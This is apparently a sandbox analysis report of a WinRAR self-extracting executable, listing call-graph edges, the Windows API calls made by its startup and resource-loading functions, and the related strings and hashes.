24263->24225 24264->24237 24265->24237 24266->24244 24267->24001 24268->24001 24269->23999 24271 345e4a 24270->24271 24315 345d67 24271->24315 24273 345eb5 24273->24014 24274 345e7d 24274->24273 24320 34ad65 CharUpperW CompareStringW 24274->24320 24277 348289 24276->24277 24326 35179d CharUpperW 24277->24326 24279 348333 24279->24017 24281 347d7b 24280->24281 24282 347dbb 24281->24282 24327 347043 74 API calls 24281->24327 24282->24029 24284 347db3 24328 346dc1 74 API calls 24284->24328 24286->24077 24288 349d73 24287->24288 24290 349d82 24287->24290 24289 349d79 FlushFileBuffers 24288->24289 24288->24290 24289->24290 24291 349dfb SetFileTime 24290->24291 24291->24082 24292->24005 24293->24008 24294->24009 24295->24029 24296->24029 24297->24022 24298->24037 24299->24028 24300->24037 24302 349992 GetFileType 24301->24302 24303 34998f 24301->24303 24304 3499a0 24302->24304 24303->24043 24304->24043 24305->24047 24306->24049 24307->24052 24308->24073 24309->24073 24310->24073 24311->24073 24312->24073 24313->24076 24314->24085 24321 345c64 24315->24321 24318 345c64 2 API calls 24319 345d88 24318->24319 24319->24274 24320->24274 24324 345c6e 24321->24324 24322 345d56 24322->24318 24322->24319 24324->24322 24325 34ad65 CharUpperW CompareStringW 24324->24325 24325->24324 24326->24279 24327->24284 24328->24282 24330 34c8db 24329->24330 24335 34a90e 84 API calls 24330->24335 24332 34c90d 24336 34a90e 84 API calls 24332->24336 24334 34c918 24335->24332 24336->24334 24338 34a5fe 24337->24338 24339 34a691 FindNextFileW 24338->24339 24340 34a621 FindFirstFileW 24338->24340 24341 34a6b0 24339->24341 24342 34a69c GetLastError 24339->24342 24343 34a675 24340->24343 24344 34a638 24340->24344 24341->24343 24342->24341 24343->23955 24345 34b66c 2 API calls 24344->24345 24346 34a64d 24345->24346 24347 34a651 FindFirstFileW 24346->24347 24348 34a66a GetLastError 24346->24348 24347->24343 24347->24348 24348->24343 24358 359d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24349->24358 24351 359d21 24352 359d2d 24351->24352 24359 359d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24351->24359 24352->23757 24352->23758 24354->23761 24355->23768 24356->23768 24357->23770 24358->24351 24359->24352 24360->23776 24362 349ef7 76 API calls 24361->24362 24363 341f5b 24362->24363 24364 3419a6 97 API calls 24363->24364 24367 341f78 24363->24367 24365 341f68 24364->24365 24365->24367 24368 346dc1 74 API calls 24365->24368 24367->23784 24367->23785 24368->24367 24906 35b8e0 92 API calls _swprintf 24907 358ce0 6 API calls 24910 3716e0 CloseHandle 24373 3410d5 24378 345bd7 24373->24378 24379 345be1 __EH_prolog 24378->24379 24380 34b07d 82 API calls 24379->24380 24381 345bed 24380->24381 24384 345dcc GetCurrentProcess GetProcessAffinityMask 24381->24384 24911 35acd0 99 API calls 24950 3519d0 26 API calls std::bad_exception::bad_exception 24387 35ead2 24388 35eade CallCatchBlock 24387->24388 24413 35e5c7 24388->24413 24390 35eae5 24392 35eb0e 24390->24392 24493 35ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24390->24493 24395 35eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24392->24395 24424 36824d 24392->24424 24398 35ebad 24395->24398 24494 367243 38 API calls 2 library calls 24395->24494 24397 35eb2d CallCatchBlock 24432 35f020 24398->24432 24408 35ebd9 24410 35ebe2 24408->24410 24495 36764a 28 API calls _abort 24408->24495 24496 35e73e 13 API calls 2 library calls 24410->24496 24414 35e5d0 24413->24414 24497 35ed5b IsProcessorFeaturePresent 24414->24497 24416 35e5dc 24498 362016 24416->24498 24418 35e5e1 24419 35e5e5 24418->24419 24507 3680d7 24418->24507 24419->24390 24422 35e5fc 24422->24390 24427 368264 24424->24427 24425 35ec4a TranslatorGuardHandler 5 API calls 24426 35eb27 24425->24426 24426->24397 24428 3681f1 24426->24428 24427->24425 24429 368220 24428->24429 24430 35ec4a TranslatorGuardHandler 5 API calls 24429->24430 24431 368249 24430->24431 24431->24395 24557 35f350 24432->24557 24435 35ebb3 24436 36819e 24435->24436 24437 36b290 51 API calls 24436->24437 24440 3681a7 24437->24440 24438 35ebbc 24441 35d5d4 24438->24441 24440->24438 24559 36b59a 38 API calls 24440->24559 24560 3500cf 24441->24560 24445 35d5f3 24609 35a335 24445->24609 24447 35d5fc 24613 3513b3 GetCPInfo 24447->24613 24449 35d606 ___scrt_fastfail 24450 35d619 GetCommandLineW 24449->24450 24451 35d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24450->24451 24452 35d628 24450->24452 24453 34400a _swprintf 51 API calls 24451->24453 24616 35bc84 24452->24616 24455 35d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24453->24455 24627 35aded LoadBitmapW 24455->24627 24458 35d636 OpenFileMappingW 24461 35d696 CloseHandle 24458->24461 24462 35d64f MapViewOfFile 24458->24462 24459 35d6a0 24621 35d287 24459->24621 24461->24451 24465 35d660 __vswprintf_c_l 24462->24465 24466 35d68d UnmapViewOfFile 24462->24466 24470 35d287 2 API calls 24465->24470 24466->24461 24472 35d67c 24470->24472 24471 358835 8 API calls 24473 35d76a DialogBoxParamW 24471->24473 24472->24466 24474 35d7a4 24473->24474 24475 35d7b6 Sleep 24474->24475 24476 35d7bd 24474->24476 24475->24476 24479 35d7cb 24476->24479 24657 35a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24476->24657 24478 35d7ea DeleteObject 24480 35d806 24478->24480 24481 35d7ff DeleteObject 24478->24481 24479->24478 24482 35d837 24480->24482 24483 35d849 24480->24483 24481->24480 24658 35d2e6 6 API calls 24482->24658 24654 35a39d 24483->24654 24485 35d83d CloseHandle 24485->24483 24487 35d883 24488 36757e GetModuleHandleW 24487->24488 24489 35ebcf 24488->24489 24489->24408 24490 3676a7 24489->24490 24794 367424 24490->24794 24493->24390 24494->24398 24495->24410 24496->24397 24497->24416 24499 36201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24498->24499 24511 36310e 24499->24511 24502 362029 24502->24418 24504 362031 24505 36203c 24504->24505 24525 36314a DeleteCriticalSection 24504->24525 24505->24418 24553 36b73a 24507->24553 24510 36203f 8 API calls 3 library calls 24510->24419 24512 363117 24511->24512 24514 363140 24512->24514 24515 362025 24512->24515 24526 363385 24512->24526 24531 36314a DeleteCriticalSection 24514->24531 24515->24502 24517 36215c 24515->24517 24546 36329a 24517->24546 24519 362166 24524 362171 24519->24524 24551 363348 6 API calls try_get_function 24519->24551 24521 36217f 24522 36218c 24521->24522 24552 36218f 6 API calls ___vcrt_FlsFree 24521->24552 24522->24504 24524->24504 24525->24502 24532 363179 24526->24532 24529 3633bc InitializeCriticalSectionAndSpinCount 24530 3633a8 24529->24530 24530->24512 24531->24515 24533 3631ad 24532->24533 24536 3631a9 24532->24536 24533->24529 24533->24530 24534 3631cd 24534->24533 24537 3631d9 GetProcAddress 24534->24537 24536->24533 24536->24534 24539 363219 24536->24539 24538 3631e9 __crt_fast_encode_pointer 24537->24538 24538->24533 24540 363236 24539->24540 24541 363241 LoadLibraryExW 24539->24541 24540->24536 24542 363275 24541->24542 24543 36325d GetLastError 24541->24543 24542->24540 24545 36328c FreeLibrary 24542->24545 24543->24542 24544 363268 LoadLibraryExW 24543->24544 24544->24542 24545->24540 24547 363179 try_get_function 5 API calls 24546->24547 24548 3632b4 24547->24548 24549 3632cc TlsAlloc 24548->24549 24550 3632bd 24548->24550 24550->24519 24551->24521 24552->24524 24556 36b753 24553->24556 24554 35ec4a TranslatorGuardHandler 5 API calls 24555 35e5ee 24554->24555 24555->24422 24555->24510 24556->24554 24558 35f033 GetStartupInfoW 24557->24558 24558->24435 24559->24440 24561 35e360 24560->24561 24562 3500d9 GetModuleHandleW 24561->24562 24563 350154 24562->24563 24564 3500f0 GetProcAddress 24562->24564 24565 350484 GetModuleFileNameW 24563->24565 24668 3670dd 42 API calls 2 library calls 24563->24668 24566 350121 GetProcAddress 24564->24566 24567 350109 24564->24567 24578 3504a3 24565->24578 24566->24563 24569 350133 24566->24569 24567->24566 24569->24563 24570 3503be 24570->24565 24571 3503c9 GetModuleFileNameW CreateFileW 24570->24571 24572 3503fc SetFilePointer 24571->24572 24573 350478 CloseHandle 24571->24573 24572->24573 24574 35040c ReadFile 24572->24574 24573->24565 24574->24573 24576 35042b 24574->24576 24576->24573 24580 350085 2 API calls 24576->24580 24579 3504d2 CompareStringW 24578->24579 24581 350508 GetFileAttributesW 24578->24581 24582 350520 24578->24582 24659 34acf5 24578->24659 24662 350085 24578->24662 24579->24578 24580->24576 24581->24578 24581->24582 24583 35052a 24582->24583 24585 350560 24582->24585 24586 350542 GetFileAttributesW 24583->24586 24588 35055a 24583->24588 24584 35066f 24608 359da4 GetCurrentDirectoryW 24584->24608 24585->24584 24587 34acf5 GetVersionExW 24585->24587 24586->24583 24586->24588 24589 35057a 24587->24589 24588->24585 24590 3505e7 24589->24590 24591 350581 24589->24591 24592 34400a _swprintf 51 API calls 24590->24592 24593 350085 2 API calls 24591->24593 24594 35060f AllocConsole 24592->24594 24595 35058b 24593->24595 24596 350667 ExitProcess 24594->24596 24597 35061c GetCurrentProcessId AttachConsole 24594->24597 24598 350085 2 API calls 24595->24598 24669 3635b3 24597->24669 24600 350595 24598->24600 24602 34ddd1 53 API calls 24600->24602 24601 35063d GetStdHandle WriteConsoleW Sleep FreeConsole 24601->24596 24603 3505b0 24602->24603 24604 34400a _swprintf 51 API calls 24603->24604 24605 3505c3 24604->24605 24606 34ddd1 53 API calls 24605->24606 24607 3505d2 24606->24607 24607->24596 24608->24445 24610 350085 2 API calls 24609->24610 24611 35a349 OleInitialize 24610->24611 24612 35a36c GdiplusStartup SHGetMalloc 24611->24612 24612->24447 24614 3513d7 IsDBCSLeadByte 24613->24614 24614->24614 24615 3513ef 24614->24615 24615->24449 24620 35bc8e 24616->24620 24617 35bda4 24617->24458 24617->24459 24618 35179d CharUpperW 24618->24620 24620->24617 24620->24618 24671 34ecad 80 API calls ___scrt_fastfail 24620->24671 24622 35e360 24621->24622 24623 35d294 SetEnvironmentVariableW 24622->24623 24625 35d2b7 24623->24625 24624 35d2df 24624->24451 24625->24624 24626 35d2d3 SetEnvironmentVariableW 24625->24626 24626->24624 24628 35ae15 24627->24628 24629 35ae0e 24627->24629 24631 35ae1b GetObjectW 24628->24631 24632 35ae2a 24628->24632 24672 359e1c FindResourceW 24629->24672 24631->24632 24633 359d1a 4 API calls 24632->24633 24634 35ae3d 24633->24634 24635 35ae80 24634->24635 24636 35ae5c 24634->24636 24637 359e1c 13 API calls 24634->24637 24646 34d31c 24635->24646 24688 359d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24636->24688 24639 35ae4d 24637->24639 24639->24636 24641 35ae53 DeleteObject 24639->24641 24640 35ae64 24689 359d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24640->24689 24641->24636 24643 35ae6d 24690 359f5d 8 API calls ___scrt_fastfail 24643->24690 24645 35ae74 DeleteObject 24645->24635 24699 34d341 24646->24699 24648 34d328 24739 34da4e GetModuleHandleW FindResourceW 24648->24739 24651 358835 24652 35e24a new 8 API calls 24651->24652 24653 358854 24652->24653 24653->24471 24655 35a3cc GdiplusShutdown CoUninitialize 24654->24655 24655->24487 24657->24479 24658->24485 24660 34ad09 GetVersionExW 24659->24660 24661 34ad45 24659->24661 24660->24661 24661->24578 24663 35e360 24662->24663 24664 350092 GetSystemDirectoryW 24663->24664 24665 3500c8 24664->24665 24666 3500aa 24664->24666 24665->24578 24667 3500bb LoadLibraryW 24666->24667 24667->24665 24668->24570 24670 3635bb 24669->24670 24670->24601 24670->24670 24671->24620 24673 359e70 24672->24673 24674 359e3e SizeofResource 24672->24674 24673->24628 24674->24673 24675 359e52 LoadResource 24674->24675 24675->24673 24676 359e63 LockResource 24675->24676 24676->24673 24677 359e77 GlobalAlloc 24676->24677 24677->24673 24678 359e92 GlobalLock 24677->24678 24679 359f21 GlobalFree 24678->24679 24680 359ea1 __vswprintf_c_l 24678->24680 24679->24673 24681 359ea9 CreateStreamOnHGlobal 24680->24681 24682 359ec1 24681->24682 24683 359f1a GlobalUnlock 24681->24683 24691 359d7b GdipAlloc 24682->24691 24683->24679 24686 359eef GdipCreateHBITMAPFromBitmap 24687 359f05 24686->24687 24687->24683 24688->24640 24689->24643 24690->24645 24692 359d8d 24691->24692 24693 359d9a 24691->24693 24695 359b0f 24692->24695 24693->24683 24693->24686 24693->24687 24696 359b37 GdipCreateBitmapFromStream 24695->24696 24697 359b30 GdipCreateBitmapFromStreamICM 24695->24697 24698 359b3c 24696->24698 24697->24698 24698->24693 24700 34d34b _wcschr __EH_prolog 24699->24700 24701 34d37a GetModuleFileNameW 24700->24701 24702 34d3ab 24700->24702 24703 34d394 24701->24703 24741 3499b0 24702->24741 24703->24702 24705 349653 79 API calls 24708 34d7ab 24705->24708 24706 34d407 24752 365a90 26 API calls 3 library calls 24706->24752 24708->24648 24709 34d3db 24709->24706 24711 353781 76 API calls 24709->24711 24723 34d627 24709->24723 24710 34d41a 24753 365a90 26 API calls 3 library calls 24710->24753 24711->24709 24713 34d563 24713->24723 24771 349d30 77 API calls 24713->24771 24717 34d57d new 24718 349bf0 80 API calls 24717->24718 24717->24723 24721 34d5a6 new 24718->24721 24720 34d42c 24720->24713 24720->24723 24754 349e40 24720->24754 24762 349bf0 24720->24762 24770 349d30 77 API calls 24720->24770 24721->24723 24737 34d5b2 new 24721->24737 24772 35137a MultiByteToWideChar 24721->24772 24723->24705 24724 34d72b 24773 34ce72 76 API calls 24724->24773 24726 34da0a 24778 34ce72 76 API calls 24726->24778 24728 34d9fa 24728->24648 24729 34d771 24774 365a90 26 API calls 3 library calls 24729->24774 24730 353781 76 API calls 24732 34d742 24730->24732 24732->24729 24732->24730 24733 34d78b 24775 365a90 26 API calls 3 library calls 24733->24775 24735 351596 WideCharToMultiByte 24735->24737 24737->24723 24737->24724 24737->24726 24737->24728 24737->24735 24776 34dd6b 50 API calls __vsnprintf 24737->24776 24777 3658d9 26 API calls 3 library calls 24737->24777 24740 34d32f 24739->24740 24740->24651 24742 3499ba 24741->24742 24743 349a39 CreateFileW 24742->24743 24744 349a59 GetLastError 24743->24744 24751 349aaa 24743->24751 24745 34b66c 2 API calls 24744->24745 24746 349a79 24745->24746 24748 349a7d CreateFileW GetLastError 24746->24748 24746->24751 24747 349ac7 SetFileTime 24749 349ae1 24747->24749 24750 349aa1 24748->24750 24749->24709 24750->24751 24751->24747 24751->24749 24752->24710 24753->24720 24755 349e64 SetFilePointer 24754->24755 24756 349e53 24754->24756 24757 349e82 GetLastError 24755->24757 24758 349e9d 24755->24758 24756->24758 24779 346fa5 75 API calls 24756->24779 24757->24758 24760 349e8c 24757->24760 24758->24720 24760->24758 24780 346fa5 75 API calls 24760->24780 24764 349bfc 24762->24764 24766 349c03 24762->24766 24764->24720 24765 349c9e 24765->24764 24793 346f6b 75 API calls 24765->24793 24766->24764 24766->24765 24768 349cc0 24766->24768 24781 34984e 24766->24781 24768->24764 24769 34984e 5 API calls 24768->24769 24769->24768 24770->24720 24771->24717 24772->24737 24773->24732 24774->24733 24775->24723 24776->24737 24777->24737 24778->24728 24779->24755 24780->24758 24782 349867 ReadFile 24781->24782 24783 34985c GetStdHandle 24781->24783 24784 349880 24782->24784 24789 3498a0 24782->24789 24783->24782 24785 349989 GetFileType 24784->24785 24786 349887 24785->24786 24787 3498b7 24786->24787 24788 3498a8 GetLastError 24786->24788 24792 349895 24786->24792 24787->24789 24790 3498c7 GetLastError 24787->24790 24788->24787 24788->24789 24789->24766 24790->24789 24790->24792 24791 34984e GetFileType 24791->24789 24792->24791 24793->24764 24795 367430 _abort 24794->24795 24796 367448 24795->24796 24797 36757e _abort GetModuleHandleW 24795->24797 24816 36a3f1 EnterCriticalSection 24796->24816 24799 36743c 24797->24799 24799->24796 24828 3675c2 GetModuleHandleExW 24799->24828 24800 3674ee 24817 36752e 24800->24817 24804 3674c5 24807 3674dd 24804->24807 24812 3681f1 _abort 5 API calls 24804->24812 24805 367537 24837 371a19 5 API calls TranslatorGuardHandler 24805->24837 24806 36750b 24820 36753d 24806->24820 24813 3681f1 _abort 5 API calls 24807->24813 24808 367450 24808->24800 24808->24804 24836 367f30 20 API calls _abort 24808->24836 24812->24807 24813->24800 24816->24808 24838 36a441 LeaveCriticalSection 24817->24838 24819 367507 24819->24805 24819->24806 24839 36a836 24820->24839 24823 36756b 24826 3675c2 _abort 8 API calls 24823->24826 24824 36754b GetPEB 24824->24823 24825 36755b GetCurrentProcess TerminateProcess 24824->24825 24825->24823 24827 367573 ExitProcess 24826->24827 24829 36760f 24828->24829 24830 3675ec GetProcAddress 24828->24830 24831 367615 FreeLibrary 24829->24831 24832 36761e 24829->24832 24834 367601 24830->24834 24831->24832 24833 35ec4a TranslatorGuardHandler 5 API calls 24832->24833 24835 367628 24833->24835 24834->24829 24835->24796 24836->24804 24838->24819 24840 36a85b 24839->24840 24844 36a851 24839->24844 24841 36a458 _abort 5 API calls 24840->24841 24841->24844 24842 35ec4a TranslatorGuardHandler 5 API calls 24843 367547 24842->24843 24843->24823 24843->24824 24844->24842 24912 35eac0 27 API calls pre_c_initialization 24954 3597c0 10 API calls 24914 369ec0 21 API calls 24955 36b5c0 GetCommandLineA GetCommandLineW 24915 35a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24956 36ebc1 21 API calls __vswprintf_c_l

                                    Executed Functions

                                    Function 0035D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 003500CF: GetModuleHandleW.KERNEL32(kernel32), ref: 003500E4
                                      • Part of subcall function 003500CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003500F6
                                      • Part of subcall function 003500CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00350127
                                      • Part of subcall function 00359DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00359DAC
                                      • Part of subcall function 0035A335: OleInitialize.OLE32(00000000), ref: 0035A34E
                                      • Part of subcall function 0035A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035A385
                                      • Part of subcall function 0035A335: SHGetMalloc.SHELL32(00388430), ref: 0035A38F
                                      • Part of subcall function 003513B3: GetCPInfo.KERNEL32(00000000,?), ref: 003513C4
                                      • Part of subcall function 003513B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 003513D8
                                    • GetCommandLineW.KERNEL32 ref: 0035D61C
                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0035D643
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0035D654
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0035D68E
                                      • Part of subcall function 0035D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035D29D
                                      • Part of subcall function 0035D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035D2D9
                                    • CloseHandle.KERNEL32(00000000), ref: 0035D697
                                    • GetModuleFileNameW.KERNEL32(00000000,0039DC90,00000800), ref: 0035D6B2
                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0039DC90), ref: 0035D6BE
                                    • GetLocalTime.KERNEL32(?), ref: 0035D6C9
                                    • _swprintf.LIBCMT ref: 0035D708
                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0035D71A
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0035D721
                                    • LoadIconW.USER32(00000000,00000064), ref: 0035D738
                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0035D789
                                    • Sleep.KERNEL32(?), ref: 0035D7B7
                                    • DeleteObject.GDI32 ref: 0035D7F0
                                    • DeleteObject.GDI32(?), ref: 0035D800
                                    • CloseHandle.KERNEL32 ref: 0035D843
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj9
                                    • API String ID: 788466649-1674459912
                                    • Opcode ID: 30228e8e9635661d94b0144de3c4d151352b0a4284c3b9dd3542766570bfce9b
                                    • Instruction ID: eeef26901c20b0bcfae1fe20e5955e9b1c26c65e9d0ef0a96f2d64f683f6d9af
                                    • Opcode Fuzzy Hash: 30228e8e9635661d94b0144de3c4d151352b0a4284c3b9dd3542766570bfce9b
                                    • Instruction Fuzzy Hash: 1561D271900340AFD733AFA6EC4AF6B37ACAB45742F400469F949972B1DB749948CB62
                                    Function 00359E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 770 359e1c-359e38 FindResourceW 771 359f2f-359f32 770->771 772 359e3e-359e50 SizeofResource 770->772 773 359e70-359e72 772->773 774 359e52-359e61 LoadResource 772->774 776 359f2e 773->776 774->773 775 359e63-359e6e LockResource 774->775 775->773 777 359e77-359e8c GlobalAlloc 775->777 776->771 778 359e92-359e9b GlobalLock 777->778 779 359f28-359f2d 777->779 780 359f21-359f22 GlobalFree 778->780 781 359ea1-359ebf call 35f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 359ec1-359ee3 call 359d7b 781->784 785 359f1a-359f1b GlobalUnlock 781->785 784->785 790 359ee5-359eed 784->790 785->780 791 359eef-359f03 GdipCreateHBITMAPFromBitmap 790->791 792 359f08-359f16 790->792 791->792 793 359f05 791->793 792->785 793->792
                                    APIs
                                    • FindResourceW.KERNEL32(0035AE4D,PNG,?,?,?,0035AE4D,00000066), ref: 00359E2E
                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0035AE4D,00000066), ref: 00359E46
                                    • LoadResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E59
                                    • LockResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E64
                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0035AE4D,00000066), ref: 00359E82
                                    • GlobalLock.KERNEL32(00000000), ref: 00359E93
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00359EB7
                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00359EFC
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00359F1B
                                    • GlobalFree.KERNEL32(00000000), ref: 00359F22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                    • String ID: PNG
                                    • API String ID: 3656887471-364855578
                                    • Opcode ID: 176693d47d8070a36bf76ff4a16cf76ec5b6a66ef4149c7d051e7b304e982fa6
                                    • Instruction ID: 8386be7f5715df5dee632c9e666494ed4fb3048719822e5a7a0b80332f59be95
                                    • Opcode Fuzzy Hash: 176693d47d8070a36bf76ff4a16cf76ec5b6a66ef4149c7d051e7b304e982fa6
                                    • Instruction Fuzzy Hash: E3316D71204712ABC7229F25EC48E2BBBADFF89752F050929FC06D6260DB31D8489B61
                                    Function 0034A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 975 34a5f4-34a61f call 35e360 978 34a691-34a69a FindNextFileW 975->978 979 34a621-34a632 FindFirstFileW 975->979 980 34a6b0-34a6b2 978->980 981 34a69c-34a6aa GetLastError 978->981 982 34a6b8-34a75c call 34fe56 call 34bcfb call 350e19 * 3 979->982 983 34a638-34a64f call 34b66c 979->983 980->982 984 34a761-34a774 980->984 981->980 982->984 989 34a651-34a668 FindFirstFileW 983->989 990 34a66a-34a673 GetLastError 983->990 989->982 989->990 992 34a684 990->992 993 34a675-34a678 990->993 996 34a686-34a68c 992->996 993->992 995 34a67a-34a67d 993->995 995->992 999 34a67f-34a682 995->999 996->984 999->996
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A628
                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A65E
                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A66A
                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A692
                                    • GetLastError.KERNEL32(?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A69E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileFind$ErrorFirstLast$Next
                                    • String ID:
                                    • API String ID: 869497890-0
                                    • Opcode ID: 7f2e8660b28b2676efbf3ce865e844d4c859064fc76a08e7f308ebbbc8118ddf
                                    • Instruction ID: 3c406d1cf2c14ef7d35bd12b54b3f99d761b2ac598233c4e536f7dd933234a9a
                                    • Opcode Fuzzy Hash: 7f2e8660b28b2676efbf3ce865e844d4c859064fc76a08e7f308ebbbc8118ddf
                                    • Instruction Fuzzy Hash: C641B372504641AFC326EF68C8C4ADAF7ECBF48340F050A2AF999D7210D734B9588B92
                                    Function 0036753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002,00000000), ref: 0036755E
                                    • TerminateProcess.KERNEL32(00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002,00000000), ref: 00367565
                                    • ExitProcess.KERNEL32 ref: 00367577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
